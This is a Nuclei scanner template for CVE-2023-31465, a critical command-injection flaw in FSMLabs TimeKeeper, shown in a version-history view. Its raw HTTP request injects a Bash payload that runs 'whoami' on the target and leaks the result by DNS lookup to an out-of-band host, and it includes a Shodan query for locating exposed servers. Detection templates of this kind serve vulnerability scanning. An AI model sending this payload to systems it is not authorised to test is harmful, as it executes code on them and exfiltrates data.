nuclei-templates/http/cves/2023/CVE-2023-31465.yaml

46 lines
2.0 KiB
YAML
Raw Normal View History

2023-10-09 09:18:51 +00:00
id: CVE-2023-31465
info:
name: TimeKeeper by FSMLabs - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
reference:
- https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-31465
2023-10-14 11:27:55 +00:00
- https://fsmlabs.com/fsmlabs-cybersecurity/
2023-10-09 09:18:51 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-10-14 11:27:55 +00:00
cve-id: CVE-2023-31465
epss-score: 0.00698
epss-percentile: 0.78069
2023-10-14 11:27:55 +00:00
cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
2023-10-09 09:18:51 +00:00
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
vendor: fsmlabs
product: timekeeper
2023-10-09 09:18:51 +00:00
shodan-query: http.favicon.hash:2134367771
2023-10-10 05:09:53 +00:00
tags: cve,cve2023,timekeeper,rce,oast
2023-10-09 09:18:51 +00:00
http:
- raw:
- |
GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"seriesID":'
# digest: 4b0a004830460221008c9e5304fd13426b0d3ec879101dfb34afe3360130afa5dad3f9094d527c2a9d022100f33579b58602e2199a6b24f8d51f207e8d30cb468978425f112bdb53c1adf78c:922c64590222798bb761d5b6d8e72950